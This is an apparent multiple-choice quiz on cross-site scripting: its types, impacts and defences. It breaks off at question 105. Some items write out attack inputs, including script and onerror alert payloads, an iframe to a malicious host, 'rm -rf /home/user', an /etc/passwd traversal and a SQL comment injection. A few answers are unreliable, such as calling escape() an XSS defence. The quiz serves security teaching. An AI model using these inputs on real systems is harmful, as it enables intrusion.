1. What is Cross-Site Scripting (XSS)?
A) A method for encrypting web traffic
B) An attack that injects malicious scripts into a website
C) A technique for compressing HTML files
D) A way to improve website performance
Answer: B) An attack that injects malicious scripts into a website
Explanation: XSS allows attackers to inject malicious scripts into web pages viewed by other users, leading to data theft, session hijacking, and defacement.
2. Which of the following is NOT a type of XSS?
A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) SQL Injection
Answer: D) SQL Injection
Explanation: SQL Injection is a separate web attack targeting databases, while XSS exploits the way web applications handle user input.
3. How does Stored XSS work?
A) The malicious script is stored permanently on the server and executed when users access the page
B) The script is reflected back to the user from an HTTP request
C) The script modifies the DOM directly from JavaScript execution
D) The script exploits browser cache vulnerabilities
Answer: A) The malicious script is stored permanently on the server and executed when users access the page
Explanation: Stored XSS occurs when the injected script is saved in the application (e.g., database) and runs when a user accesses the affected page.
4. Which of the following is a common example of Reflected XSS?
A) A malicious script saved in a user profile comment section
B) An attack that injects scripts into an email body
C) A script embedded in a URL parameter that executes in a user’s browser when clicked
D) An attack that modifies session cookies
Answer: C) A script embedded in a URL parameter that executes in a user’s browser when clicked
Explanation: Reflected XSS occurs when a script is sent as a part of a request (e.g., URL) and immediately executed in the browser without being stored.
5. Which of the following best describes DOM-based XSS?
A) XSS where the malicious script is stored in a database
B) XSS where the attack is reflected through an HTTP response
C) XSS where JavaScript modifies the DOM without touching the server
D) XSS where the script is embedded in an iframe
Answer: C) XSS where JavaScript modifies the DOM without touching the server
Explanation: DOM-based XSS occurs when JavaScript modifies the page’s DOM dynamically, leading to script execution without sending a request to the server.
6. What is the most effective method to prevent Stored XSS?
A) Using client-side input validation
B) Encoding user inputs before storing them
C) Storing inputs as plain text in a database
D) Allowing only GET requests
Answer: B) Encoding user inputs before storing them
Explanation: Encoding user inputs ensures that stored data is treated as text rather than executable code, preventing script execution.
7. How can Reflected XSS attacks be mitigated?
A) Disabling JavaScript on all web pages
B) Filtering user inputs before reflecting them in responses
C) Storing user inputs in cookies
D) Using weak encryption methods
Answer: B) Filtering user inputs before reflecting them in responses
Explanation: Filtering and validating user inputs prevent malicious scripts from being executed when included in HTTP responses.
8. Which security header helps mitigate XSS attacks?
A) Content-Security-Policy (CSP)
B) X-Powered-By
C) HTTP 404 Header
D) Expires Header
Answer: A) Content-Security-Policy (CSP)
Explanation: CSP restricts sources from which scripts can be executed, reducing the impact of XSS attacks.
9. What is the role of the “innerHTML” property in DOM-based XSS?
A) It prevents JavaScript execution in the browser
B) It allows attackers to inject and execute malicious scripts
C) It converts text into safe HTML elements
D) It filters out JavaScript from user inputs
Answer: B) It allows attackers to inject and execute malicious scripts
Explanation: innerHTML directly inserts HTML content, making it vulnerable to malicious script injection.
10. Which of the following input sanitization methods is effective against XSS?
A) Encoding special characters
B) Replacing all JavaScript code with random strings
C) Converting JavaScript to uppercase
D) Encrypting user input before storing
Answer: A) Encoding special characters
Explanation: Encoding special characters prevents browsers from interpreting input as executable scripts.
11. What does the “HttpOnly” flag in cookies do?
A) Allows JavaScript to access cookies
B) Prevents JavaScript from accessing cookies
C) Encrypts cookies with a password
D) Makes cookies last indefinitely
Answer: B) Prevents JavaScript from accessing cookies
Explanation: The HttpOnly flag prevents JavaScript from accessing cookies, reducing the risk of XSS-based session hijacking.
12. How does JavaScript event handling contribute to XSS?
A) Event handlers like onmouseover can execute injected scripts
B) Event handlers remove all JavaScript from a webpage
C) Event handlers always sanitize user input
D) Event handlers prevent script execution
Answer: A) Event handlers like onmouseover can execute injected scripts
Explanation: JavaScript event handlers can trigger malicious scripts when interacting with manipulated elements.
13. Which JavaScript method is dangerous and should be avoided due to XSS risks?
A) console.log()
B) eval()
C) parseInt()
D) toUpperCase()
Answer: B) eval()
Explanation: eval() executes arbitrary JavaScript, making it highly dangerous if used with user input.
14. What is a key difference between Reflected and Stored XSS?
A) Reflected XSS is persistent, while Stored XSS is temporary
B) Stored XSS affects only the attacker, while Reflected XSS affects multiple users
C) Stored XSS is persistent and affects multiple users, while Reflected XSS requires interaction
D) Reflected XSS requires a database to function
Answer: C) Stored XSS is persistent and affects multiple users, while Reflected XSS requires interaction
Explanation: Stored XSS is injected into a system (e.g., a database) and impacts many users, whereas Reflected XSS requires a user to trigger the attack.
15. What is the purpose of escaping HTML entities?
A) To make HTML more readable
B) To ensure scripts execute properly
C) To prevent browsers from interpreting special characters as executable code
D) To remove JavaScript from a webpage
Answer: C) To prevent browsers from interpreting special characters as executable code
Explanation: Escaping converts characters like < and > into their HTML entity equivalents, preventing XSS attacks.
16. Which of the following is the best approach to prevent DOM-based XSS?
A) Using innerHTML for dynamic content updates
B) Using textContent or createTextNode instead of innerHTML
C) Allowing user-generated JavaScript to execute freely
D) Disabling JavaScript in the browser
Answer: B) Using textContent or createTextNode instead of innerHTML
Explanation: textContent and createTextNode safely insert text without executing JavaScript, preventing DOM-based XSS.
17. Which browser security feature helps prevent XSS attacks?
A) Content Security Policy (CSP)
B) Incognito mode
C) Browser extensions
D) Disabling pop-ups
Answer: A) Content Security Policy (CSP)
Explanation: CSP restricts scripts from executing from untrusted sources, reducing the risk of XSS attacks.
18. In Reflected XSS, how does an attacker typically deliver the malicious script to the victim?
A) Through a phishing email or malicious link
B) By injecting it into a stored database
C) By modifying the browser settings
D) Through a mobile app update
Answer: A) Through a phishing email or malicious link
Explanation: Reflected XSS requires user interaction, often by clicking a crafted link with a malicious script.
19. What type of XSS attack would occur if a vulnerable website reflects a malicious script included in a URL?
A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) Blind SQL Injection
Answer: B) Reflected XSS
Explanation: In Reflected XSS, the script is injected via a URL and executed immediately without being stored.
20. What is the primary goal of an XSS attack?
A) To slow down a website’s performance
B) To inject malicious scripts that execute in a victim’s browser
C) To encrypt files for ransom
D) To generate spam emails
Answer: B) To inject malicious scripts that execute in a victim’s browser
Explanation: XSS allows attackers to execute malicious JavaScript in the victim’s browser, often leading to data theft or session hijacking.
21. What is the impact of an XSS attack on a website?
A) Unauthorized access to sensitive data
B) Defacement of web pages
C) Session hijacking
D) All of the above
Answer: D) All of the above
Explanation: XSS attacks can steal data, hijack user sessions, and deface websites by modifying the DOM.
22. What does the “SameSite” cookie attribute do?
A) Prevents cookies from being accessed by JavaScript
B) Restricts cookies from being sent in cross-site requests
C) Disables cookies in incognito mode
D) Encrypts cookie data
Answer: B) Restricts cookies from being sent in cross-site requests
Explanation: The SameSite attribute helps prevent cross-site request forgery (CSRF) and some XSS attacks by restricting cookie access.
23. Why is JavaScript eval() function dangerous?
A) It executes arbitrary code, making it vulnerable to injection attacks
B) It is slow and inefficient
C) It is deprecated in modern browsers
D) It only works in Internet Explorer
Answer: A) It executes arbitrary code, making it vulnerable to injection attacks
Explanation: eval() should be avoided as it can execute untrusted JavaScript code, leading to XSS vulnerabilities.
24. Which of the following can help prevent XSS attacks?
A) Filtering user input
B) Encoding output before rendering
C) Using security headers like CSP
D) All of the above
Answer: D) All of the above
Explanation: Preventing XSS requires multiple layers of protection, including input validation, output encoding, and security headers.
25. How can a web application validate input to prevent XSS?
A) Allowing all characters in user input
B) Using a predefined allowlist of acceptable characters
C) Converting all user input to uppercase
D) Stripping spaces from user input
Answer: B) Using a predefined allowlist of acceptable characters
Explanation: Allowlisting ensures only expected and safe characters are processed, reducing the risk of malicious script injection.
26. Which of these is a real-world XSS attack?
A) The Stuxnet malware
B) The MySpace Samy Worm
C) The WannaCry ransomware
D) The Heartbleed vulnerability
Answer: B) The MySpace Samy Worm
Explanation: The Samy Worm was a Stored XSS attack that spread across MySpace by exploiting a vulnerability in user profile comments.
27. What is an effective method for securing JavaScript event handlers from XSS attacks?
A) Using inline event handlers
B) Storing scripts in a database
C) Using addEventListener() instead of inline event handlers
D) Allowing user-generated scripts to run freely
Answer: C) Using addEventListener() instead of inline event handlers
Explanation: addEventListener() prevents direct script execution within HTML attributes, reducing XSS risks.
28. How does an attacker steal session cookies using XSS?
A) By executing JavaScript that reads document cookies and sends them to a remote server
B) By sending a phishing email
C) By modifying the HTML structure of the page
D) By changing the user’s password
Answer: A) By executing JavaScript that reads document cookies and sends them to a remote server
Explanation: Attackers inject JavaScript that accesses document.cookie, allowing them to steal session tokens and impersonate users.
29. What is a key reason why some XSS attacks succeed despite input validation?
A) Developers fail to encode output properly
B) Web browsers are insecure
C) Users do not update their operating system
D) XSS is impossible to prevent completely
Answer: A) Developers fail to encode output properly
Explanation: Even if input is validated, failure to encode output properly can still result in XSS execution.
30. Which type of website feature is most commonly targeted for XSS attacks?
A) Static informational pages
B) User-generated content (comments, forums, chat boxes)
C) Image galleries
D) Downloadable PDFs
Answer: B) User-generated content (comments, forums, chat boxes)
Explanation: User input fields that allow text, links, or embedded content are prime targets for Stored XSS attacks.
31. Why is JavaScript’s document.write() method considered insecure?
A) It prevents XSS attacks
B) It allows attackers to inject and execute scripts
C) It removes all malicious scripts from a webpage
D) It automatically encodes input
Answer: B) It allows attackers to inject and execute scripts
Explanation: document.write() inserts raw HTML into a webpage, making it vulnerable to XSS when used improperly with user input.
32. Which XSS attack requires no user interaction for execution?
A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) Both B and C
Answer: A) Stored XSS
Explanation: Stored XSS is executed whenever a user loads the affected webpage, without needing interaction like clicking a link.
33. What role do browser security mechanisms like the Same-Origin Policy (SOP) play in preventing XSS?
A) They completely eliminate XSS
B) They prevent cross-site data access but do not prevent XSS
C) They encrypt JavaScript code to prevent execution
D) They disable JavaScript on all web pages
Answer: B) They prevent cross-site data access but do not prevent XSS
Explanation: SOP restricts cross-site requests but does not prevent XSS since the attack occurs within the same origin.
34. How do Content Security Policy (CSP) rules help prevent XSS?
A) By allowing only scripts from trusted sources
B) By disabling JavaScript globally
C) By forcing browsers to ignore all scripts
D) By automatically removing all user input
Answer: A) By allowing only scripts from trusted sources
Explanation: CSP restricts script execution to trusted domains, reducing the chances of running malicious JavaScript.
35. Which tool is commonly used for testing XSS vulnerabilities?
A) Metasploit
B) Burp Suite
C) Nmap
D) Wireshark
Answer: B) Burp Suite
Explanation: Burp Suite is widely used for testing web vulnerabilities, including XSS.
36. What is the function of the X-XSS-Protection header?
A) It completely eliminates XSS vulnerabilities
B) It enables browser-based XSS filters to block malicious scripts
C) It disables JavaScript execution
D) It prevents CSRF attacks
Answer: B) It enables browser-based XSS filters to block malicious scripts
Explanation: The X-XSS-Protection header instructs browsers to stop rendering pages when an XSS attack is detected.
37. In Reflected XSS, where is the malicious payload typically found?
A) In the victim’s local storage
B) In the web server’s database
C) In the HTTP request and response
D) In the browser cache
Answer: C) In the HTTP request and response
Explanation: Reflected XSS occurs when user input is included in an HTTP request and reflected back in the response.
38. Which JavaScript function is commonly exploited in DOM-based XSS attacks?
A) document.getElementById()
B) window.location.href
C) console.log()
D) alert()
Answer: B) window.location.href
Explanation: window.location.href can be manipulated to execute malicious JavaScript in DOM-based XSS.
39. Which of these techniques is NOT an effective way to prevent XSS?
A) Escaping special characters
B) Disabling JavaScript globally
C) Using a Content Security Policy (CSP)
D) Sanitizing user input
Answer: B) Disabling JavaScript globally
Explanation: While disabling JavaScript can prevent XSS, it is not practical as many websites rely on JavaScript for functionality.
40. What is the primary risk of allowing users to input HTML content?
A) It slows down the website
B) It increases storage costs
C) It enables attackers to inject malicious scripts
D) It improves website performance
Answer: C) It enables attackers to inject malicious scripts
Explanation: Allowing users to input raw HTML can lead to XSS if the application does not properly sanitize inputs.
41. What makes CSP more effective in preventing XSS?
A) It allows inline scripts by default
B) It blocks all JavaScript execution
C) It restricts the execution of scripts to trusted sources
D) It removes all user-generated content
Answer: C) It restricts the execution of scripts to trusted sources
Explanation: CSP defines which scripts can run, blocking unauthorized scripts injected via XSS attacks.
42. What is “self-XSS,” and why is it dangerous?
A) A user unknowingly runs an XSS script on themselves
B) A type of stored XSS attack
C) An attack that only affects admins
D) A technique to prevent XSS
Answer: A) A user unknowingly runs an XSS script on themselves
Explanation: Self-XSS tricks users into pasting and executing malicious scripts in their browser’s developer console.
43. Which input validation method is more secure against XSS?
A) Blacklisting dangerous characters
B) Allowlisting only accepted characters
C) Converting all input to uppercase
D) Removing all spaces from input
Answer: B) Allowlisting only accepted characters
Explanation: Allowlisting ensures that only expected and safe characters are allowed, preventing script injections.
44. How do attackers use XSS to steal login credentials?
A) By modifying the page’s CSS
B) By redirecting users to a phishing page
C) By injecting scripts that capture keystrokes and send them to an attacker’s server
D) Both B and C
Answer: D) Both B and C
Explanation: Attackers can redirect users to fake login pages or use scripts to capture input fields and send credentials.
45. Why should developers avoid inline JavaScript when possible?
A) It makes debugging harder
B) It increases the risk of XSS attacks
C) It slows down page rendering
D) It is not supported by modern browsers
Answer: B) It increases the risk of XSS attacks
Explanation: Inline JavaScript can be easily exploited by XSS attacks if an attacker manages to inject malicious content.
46. What does sandboxing JavaScript execution do?
A) Allows JavaScript to run in a restricted environment
B) Blocks all JavaScript execution
C) Encrypts JavaScript files
D) Prevents browsers from caching scripts
Answer: A) Allows JavaScript to run in a restricted environment
Explanation: Sandboxing limits JavaScript’s ability to interact with the browser environment, reducing XSS risks.
47. How does an attacker escalate an XSS attack to gain admin access?
A) By modifying the website’s stylesheet
B) By using JavaScript to steal session cookies
C) By changing the website’s favicon
D) By disabling browser security settings
Answer: B) By using JavaScript to steal session cookies
Explanation: Stolen session cookies allow attackers to impersonate administrators and gain unauthorized access.
48. What happens when a script executes in an XSS attack?
A) The browser crashes
B) The attacker gains remote control of the server
C) The attacker’s script runs in the victim’s browser
D) The browser deletes all cookies
Answer: C) The attacker’s script runs in the victim’s browser
Explanation: XSS allows attackers to execute scripts within a victim’s browser, leading to data theft or account compromise.
49. Why are older web applications more prone to XSS attacks?
A) They use modern security mechanisms
B) They often lack proper input validation and security headers
C) They are less frequently targeted by attackers
D) They have built-in security features
Answer: B) They often lack proper input validation and security headers
Explanation: Older applications may not implement modern security best practices, making them vulnerable.
50. How can JavaScript’s setTimeout() and setInterval() functions contribute to XSS?
A) They prevent scripts from executing
B) They allow delayed execution of injected malicious scripts
C) They block user input
D) They disable cookies
Answer: B) They allow delayed execution of injected malicious scripts
Explanation: Attackers can use setTimeout() and setInterval() to execute XSS payloads after the page has loaded, bypassing some security filters.
51. What is the main difference between Stored XSS and Reflected XSS?
A) Stored XSS is executed immediately, while Reflected XSS is stored in the database
B) Stored XSS is saved on the server and affects multiple users, while Reflected XSS requires user interaction
C) Stored XSS only affects administrators, while Reflected XSS affects regular users
D) There is no difference between Stored XSS and Reflected XSS
Answer: B) Stored XSS is saved on the server and affects multiple users, while Reflected XSS requires user interaction
Explanation: Stored XSS is persistent and impacts all users accessing the affected content, whereas Reflected XSS requires the victim to interact with a maliciously crafted request.
52. Which of the following payloads is a typical example of a Reflected XSS attack?
A) <script>alert('XSS')</script> injected into a search query URL
B) <iframe src="https://malicious-site.com"></iframe> stored in a forum post
C) SQL query altering database records
D) Creating a new user account with admin privileges
Answer: A) <script>alert('XSS')</script> injected into a search query URL
Explanation: In Reflected XSS, the script is injected into a URL parameter and executed when a user clicks the link.
53. What type of input validation should be used to prevent XSS?
A) Blacklisting dangerous keywords
B) Encoding and sanitizing user inputs
C) Converting all input to uppercase
D) Disabling all JavaScript functions
Answer: B) Encoding and sanitizing user inputs
Explanation: Encoding special characters and sanitizing inputs prevent them from being interpreted as executable scripts.
54. Which of the following is a common indicator of an active XSS attack?
A) Website pages loading faster than usual
B) Unexpected pop-ups or redirections
C) Increased CPU usage on the client’s machine
D) Users being logged out of their accounts automatically
Answer: B) Unexpected pop-ups or redirections
Explanation: XSS attacks often inject JavaScript that triggers pop-ups, redirects, or unauthorized actions in the user’s browser.
55. How do web application firewalls (WAFs) help prevent XSS attacks?
A) They block all JavaScript execution in browsers
B) They detect and block malicious requests containing XSS payloads
C) They disable HTML form submissions
D) They store user input in encrypted format
Answer: B) They detect and block malicious requests containing XSS payloads
Explanation: WAFs inspect incoming requests and filter out suspicious patterns associated with XSS attacks.
56. What is the purpose of JavaScript’s escape() function?
A) To execute JavaScript safely in the browser
B) To prevent XSS by encoding special characters
C) To remove all HTML tags from user input
D) To generate random JavaScript code
Answer: B) To prevent XSS by encoding special characters
Explanation: The escape() function encodes special characters to prevent them from being interpreted as HTML or JavaScript.
57. Which of the following is a dangerous practice that can lead to XSS vulnerabilities?
A) Using parameterized queries
B) Allowing users to insert raw HTML without validation
C) Implementing HTTP Strict Transport Security (HSTS)
D) Using two-factor authentication
Answer: B) Allowing users to insert raw HTML without validation
Explanation: Allowing raw HTML input without sanitization can enable attackers to inject malicious scripts.
58. What is “cookie stealing” in the context of an XSS attack?
A) A method of encrypting cookies for security
B) The process of injecting malware into cookies
C) Capturing session cookies via injected JavaScript
D) A feature in modern browsers to protect cookies
Answer: C) Capturing session cookies via injected JavaScript
Explanation: Attackers use JavaScript to read document.cookie and steal session tokens, leading to session hijacking.
59. Why should developers avoid using innerHTML with untrusted data?
A) It makes the page load slower
B) It can execute malicious JavaScript
C) It requires additional memory allocation
D) It only works on specific browsers
Answer: B) It can execute malicious JavaScript
Explanation: innerHTML directly inserts HTML content, allowing XSS payloads to execute if the input is not properly sanitized.
60. What does JavaScript’s textContent method do differently from innerHTML?
A) It prevents JavaScript execution and only sets text
B) It automatically removes all user input
C) It executes embedded JavaScript safely
D) It replaces all characters with asterisks
Answer: A) It prevents JavaScript execution and only sets text
Explanation: Unlike innerHTML, textContent only sets text without parsing it as HTML, making it safer.
61. Which of the following can mitigate the risk of session hijacking due to XSS?
A) Storing session tokens in local storage
B) Setting cookies with the HttpOnly and Secure flags
C) Using client-side session management
D) Encrypting JavaScript files
Answer: B) Setting cookies with the HttpOnly and Secure flags
Explanation: The HttpOnly flag prevents JavaScript from accessing cookies, reducing the risk of theft via XSS.
62. Why is it dangerous to use eval() with user input?
A) It makes JavaScript slower
B) It can execute arbitrary JavaScript code, leading to security risks
C) It automatically converts input into numbers
D) It prevents XSS attacks
Answer: B) It can execute arbitrary JavaScript code, leading to security risks
Explanation: eval() executes any JavaScript passed to it, making it highly vulnerable to XSS attacks.
63. How can attackers bypass input filtering mechanisms?
A) By using encoding techniques like URL encoding or Base64
B) By disabling browser JavaScript
C) By modifying HTML structure
D) By using a VPN
Answer: A) By using encoding techniques like URL encoding or Base64
Explanation: Attackers can encode payloads in different formats to evade input filters and execute XSS.
64. What does the CSP default-src 'none' directive do?
A) It disables JavaScript execution completely
B) It prevents all content from loading unless explicitly allowed
C) It only allows images to load
D) It restricts inline scripts but allows external ones
Answer: B) It prevents all content from loading unless explicitly allowed
Explanation: default-src 'none' blocks all content unless explicitly permitted via other CSP directives.
65. What is “Blind XSS”?
A) An XSS attack that does not immediately reflect back to the attacker
B) A harmless form of XSS
C) A technique used to test for vulnerabilities
D) A server-side filtering mechanism
Answer: A) An XSS attack that does not immediately reflect back to the attacker
Explanation: Blind XSS occurs when a payload is stored and executed later in an admin or reporting panel.
66. Which browser feature helps prevent cross-site scripting attacks?
A) Ad blockers
B) Content Security Policy (CSP)
C) Incognito mode
D) JavaScript minification
Answer: B) Content Security Policy (CSP)
Explanation: CSP helps restrict the execution of untrusted scripts, mitigating XSS attacks.
67. What is the primary risk of allowing user-generated content on a website?
A) Increased storage usage
B) Potential injection of malicious scripts (XSS)
C) Slower website performance
D) Higher bandwidth consumption
Answer: B) Potential injection of malicious scripts (XSS)
Explanation: Allowing user-generated content without proper validation increases the risk of XSS.
68. What is the role of sanitization libraries like DOMPurify?
A) They remove all JavaScript from a website
B) They filter out malicious code from user input
C) They store user input in encrypted format
D) They block all HTML elements
Answer: B) They filter out malicious code from user input
Explanation: Libraries like DOMPurify sanitize HTML inputs to prevent XSS attacks.
69. What is an example of a JavaScript event that can trigger an XSS payload?
A) onclick
B) onmouseover
C) onerror
D) All of the above
Answer: D) All of the above
Explanation: Various JavaScript event handlers can be exploited to trigger XSS payloads.
70. What makes an XSS vulnerability critical?
A) It allows attackers to execute code remotely on a server
B) It enables remote execution of scripts in user browsers
C) It only affects a small number of users
D) It is difficult to exploit
Answer: B) It enables remote execution of scripts in user browsers
Explanation: XSS can be critical because it allows attackers to control a user’s browser session, steal credentials, or manipulate site content.
71. Which of the following best describes a Reflected XSS attack?
A) The script is stored on the server and executed later
B) The malicious script is injected into a database and affects multiple users
C) The script is included in the HTTP request and reflected back in the response
D) The attack targets only mobile applications
Answer: C) The script is included in the HTTP request and reflected back in the response
Explanation: Reflected XSS occurs when a script is sent in a request (like a URL parameter) and immediately reflected back in the response.
72. How does a Content Security Policy (CSP) mitigate XSS attacks?
A) It blocks all JavaScript execution
B) It defines a whitelist of trusted content sources
C) It disables HTML rendering
D) It encrypts all user input
Answer: B) It defines a whitelist of trusted content sources
Explanation: CSP restricts the execution of scripts to predefined trusted sources, reducing the impact of XSS.
73. What makes DOM-based XSS different from other types of XSS?
A) It executes in the victim’s browser without reaching the server
B) It requires the attacker to have admin privileges
C) It modifies the website’s database
D) It only affects desktop browsers
Answer: A) It executes in the victim’s browser without reaching the server
Explanation: In DOM-based XSS, the malicious script modifies the DOM structure directly without being reflected from the server.
74. What is the primary reason attackers use XSS?
A) To slow down the website
B) To execute malicious scripts in a victim’s browser
C) To break SSL encryption
D) To perform SQL Injection
Answer: B) To execute malicious scripts in a victim’s browser
Explanation: XSS is used to inject JavaScript that can steal data, hijack sessions, or manipulate website content.
75. Which of the following input fields is most vulnerable to Stored XSS?
A) Search bars
B) Login forms
C) User comment sections
D) CAPTCHA fields
Answer: C) User comment sections
Explanation: Stored XSS occurs when malicious scripts are saved in a database and executed when users view affected content, like comments.
76. Which JavaScript function should be avoided to prevent XSS?
A) console.log()
B) innerText
C) eval()
D) setTimeout()
Answer: C) eval()
Explanation: eval() executes arbitrary JavaScript and can lead to severe security vulnerabilities if used with user input.
77. How can using HTTP-only cookies help prevent XSS attacks?
A) By encrypting all cookies
B) By preventing JavaScript from accessing cookies
C) By making cookies expire faster
D) By storing cookies on a different server
Answer: B) By preventing JavaScript from accessing cookies
Explanation: HTTP-only cookies are inaccessible to JavaScript, preventing XSS attacks from stealing session tokens.
78. Which of the following is a real-world consequence of XSS attacks?
A) Defacement of websites
B) Theft of sensitive user data
C) Malware distribution
D) All of the above
Answer: D) All of the above
Explanation: XSS can be used to deface websites, steal user data, and distribute malware by injecting malicious scripts.
79. Why is URL encoding used by attackers in XSS payloads?
A) To obfuscate the payload and evade security filters
B) To make the script run faster
C) To reduce the script size
D) To execute SQL commands
Answer: A) To obfuscate the payload and evade security filters
Explanation: Attackers use URL encoding to disguise malicious scripts and bypass security mechanisms.
80. Which of these is an example of an XSS payload?
A) SELECT * FROM users WHERE id=1;
B) <script>alert('XSS')</script>
C) rm -rf /home/user
D) 127.0.0.1:8080
Answer: B) <script>alert('XSS')</script>
Explanation: The <script> tag is commonly used in XSS attacks to execute JavaScript within the victim’s browser.
81. Which of the following can prevent XSS in a web application?
A) Using parameterized queries
B) Encoding user-generated content before displaying it
C) Disabling all JavaScript execution
D) Blocking all user-generated content
Answer: B) Encoding user-generated content before displaying it
Explanation: Encoding user inputs ensures that they are treated as plain text rather than executable scripts.
82. What is a major weakness of blacklist-based XSS prevention?
A) It prevents all types of XSS
B) Attackers can bypass it using encoded or obfuscated payloads
C) It improves website speed
D) It encrypts all user inputs
Answer: B) Attackers can bypass it using encoded or obfuscated payloads
Explanation: Blacklist-based prevention is ineffective as attackers can use encoding techniques to bypass filters.
83. How can JavaScript’s setInterval() function contribute to XSS attacks?
A) It blocks XSS execution
B) It allows repeated execution of malicious scripts
C) It prevents cookies from being stolen
D) It only works with HTML5
Answer: B) It allows repeated execution of malicious scripts
Explanation: Attackers can use setInterval() to repeatedly execute XSS payloads.
84. What is a simple test to check if an input field is vulnerable to XSS?
A) Entering 1=1
B) Entering <script>alert(1)</script>
C) Entering ../../etc/passwd
D) Entering admin' --
Answer: B) Entering <script>alert(1)</script>
Explanation: If an input field allows <script>alert(1)</script> to execute, it is vulnerable to XSS.
85. Why is localStorage risky for storing sensitive data?
A) It does not support large data storage
B) It can be accessed by JavaScript, making it vulnerable to XSS
C) It slows down the browser
D) It encrypts data automatically
Answer: B) It can be accessed by JavaScript, making it vulnerable to XSS
Explanation: localStorage is accessible via JavaScript, so an XSS attack can steal stored data.
86. What type of security testing is most useful for detecting XSS vulnerabilities?
A) Static Application Security Testing (SAST)
B) Network penetration testing
C) Dynamic Application Security Testing (DAST)
D) Social engineering assessments
Answer: C) Dynamic Application Security Testing (DAST)
Explanation: DAST analyzes applications in runtime to detect XSS and other security flaws.
87. What is “Mutation XSS”?
A) An XSS variant that exploits JavaScript frameworks and automatic DOM modifications
B) A form of stored XSS targeting mobile browsers
C) A method of hiding JavaScript payloads in CSS files
D) A technique used to detect XSS vulnerabilities
Answer: A) An XSS variant that exploits JavaScript frameworks and automatic DOM modifications
Explanation: Mutation XSS occurs when the browser modifies inserted content, triggering an unexpected script execution.
88. Which type of web applications are at the highest risk of XSS attacks?
A) Applications without JavaScript
B) Static websites
C) Web applications that allow user-generated content
D) Websites using HTTP/2
Answer: C) Web applications that allow user-generated content
Explanation: Websites that allow users to submit comments, reviews, or posts are more susceptible to XSS.
89. Why should developers use security libraries like DOMPurify?
A) To automatically sanitize user input
B) To replace JavaScript with PHP
C) To block all user submissions
D) To remove network security threats
Answer: A) To automatically sanitize user input
Explanation: DOMPurify helps sanitize HTML and prevent XSS vulnerabilities.
90. What is a key takeaway from the MySpace Samy Worm incident?
A) XSS can be used for self-replicating attacks
B) XSS is harmless and only affects cookies
C) JavaScript is not a security risk
D) Websites should allow all HTML input
Answer: A) XSS can be used for self-replicating attacks
Explanation: The MySpace Samy Worm spread automatically by exploiting Stored XSS.
91. What is a potential risk of allowing users to submit JavaScript-based content?
A) Faster page load times
B) Users can modify the UI
C) Increased risk of XSS attacks
D) Improved website security
Answer: C) Increased risk of XSS attacks
Explanation: Allowing users to submit JavaScript-based content without proper validation increases the risk of XSS.
92. Why is Base64 encoding sometimes used by attackers in XSS payloads?
A) To make the script execute faster
B) To bypass security filters that block raw script tags
C) To encrypt user data
D) To prevent JavaScript execution
Answer: B) To bypass security filters that block raw script tags
Explanation: Attackers use Base64 encoding to obfuscate their payloads and evade security mechanisms.
93. Which of the following best describes a Blind XSS attack?
A) The attacker does not see immediate results of the attack
B) The XSS payload is only executed in the victim’s console
C) The attacker needs to manually confirm the execution of the script
D) The attack works only on mobile browsers
Answer: A) The attacker does not see immediate results of the attack
Explanation: Blind XSS occurs when the payload is stored and later executed in an admin panel or another area that the attacker does not directly see.
94. What is a Polyglot XSS payload?
A) A script that works across multiple programming languages
B) A payload that bypasses multiple security filters using different encoding techniques
C) A script that can only run on specific browsers
D) An encrypted JavaScript function
Answer: B) A payload that bypasses multiple security filters using different encoding techniques
Explanation: Polyglot XSS payloads are designed to evade multiple layers of security defenses by using different encoding methods.
95. Which of the following is an example of an event-driven XSS attack?
A) <input type="text" value="XSS">
B) <img src="x" onerror="alert('XSS')">
C) SELECT * FROM users WHERE id=1;
D) https://example.com/login
Answer: B) <img src="x" onerror="alert('XSS')">
Explanation: The onerror event triggers when an image fails to load, making it a common technique for XSS attacks.
96. How can WebSockets be vulnerable to XSS attacks?
A) WebSockets do not support authentication
B) WebSockets can transmit malicious JavaScript if user input is not sanitized
C) WebSockets encrypt all traffic by default
D) WebSockets prevent all types of script injection
Answer: B) WebSockets can transmit malicious JavaScript if user input is not sanitized
Explanation: If input validation is not properly implemented, WebSockets can be used to send and execute malicious scripts.
97. What makes CSP effective against XSS attacks?
A) It disables all JavaScript execution
B) It allows execution only from trusted sources
C) It blocks HTTP requests
D) It removes all user-generated content
Answer: B) It allows execution only from trusted sources
Explanation: CSP restricts the execution of scripts to trusted domains, preventing XSS exploitation.
98. Which browser mechanism helps prevent session hijacking via XSS?
A) Incognito mode
B) HTTP-only cookies
C) Disabling JavaScript
D) Using a VPN
Answer: B) HTTP-only cookies
Explanation: HTTP-only cookies prevent JavaScript from accessing session tokens, reducing the risk of session hijacking through XSS.
99. How does an attacker use a drive-by XSS attack?
A) By requiring user interaction to execute the script
B) By embedding malicious scripts in trusted websites
C) By exploiting vulnerabilities in offline applications
D) By modifying browser settings
Answer: B) By embedding malicious scripts in trusted websites
Explanation: Drive-by XSS occurs when malicious scripts execute automatically when users visit a compromised site.
100. What does the CSP script-src 'self' directive do?
A) Allows scripts only from the same domain
B) Blocks all JavaScript execution
C) Encrypts all script files
D) Allows scripts from all sources
Answer: A) Allows scripts only from the same domain
Explanation: The script-src 'self' CSP directive ensures that JavaScript executes only from the same origin, mitigating XSS risks.
101. What is a key characteristic of a Persistent XSS attack?
A) The malicious script is stored and executed repeatedly when accessed
B) The script executes only once for each victim
C) The script modifies the browser’s security settings
D) It requires manual execution by the attacker
Answer: A) The malicious script is stored and executed repeatedly when accessed
Explanation: Stored XSS persists in the application and executes whenever the affected content is loaded.
102. Which of these input fields is least likely to be exploited for XSS?
A) Comment sections
B) Search bars with unescaped output
C) Password fields
D) Chat messages
Answer: C) Password fields
Explanation: Password fields do not display user input as HTML, making them less vulnerable to XSS.
103. What role does document.write() play in XSS attacks?
A) It prevents JavaScript from executing
B) It allows dynamic content injection, making it vulnerable to XSS
C) It blocks script execution
D) It automatically encodes input
Answer: B) It allows dynamic content injection, making it vulnerable to XSS
Explanation: document.write() inserts content into the DOM dynamically, which can be exploited for XSS if input is not sanitized.
104. How does Clickjacking relate to XSS?
A) It exploits browser vulnerabilities to steal cookies
B) It involves tricking users into clicking hidden elements via iframes
C) It disables JavaScript execution
D) It encrypts web pages
Answer: B) It involves tricking users into clicking hidden elements via iframes
Explanation: Clickjacking tricks users into performing actions by overlaying an invisible UI, sometimes combined with XSS to steal credentials.
105. How can input validation help mitigate XSS risks?
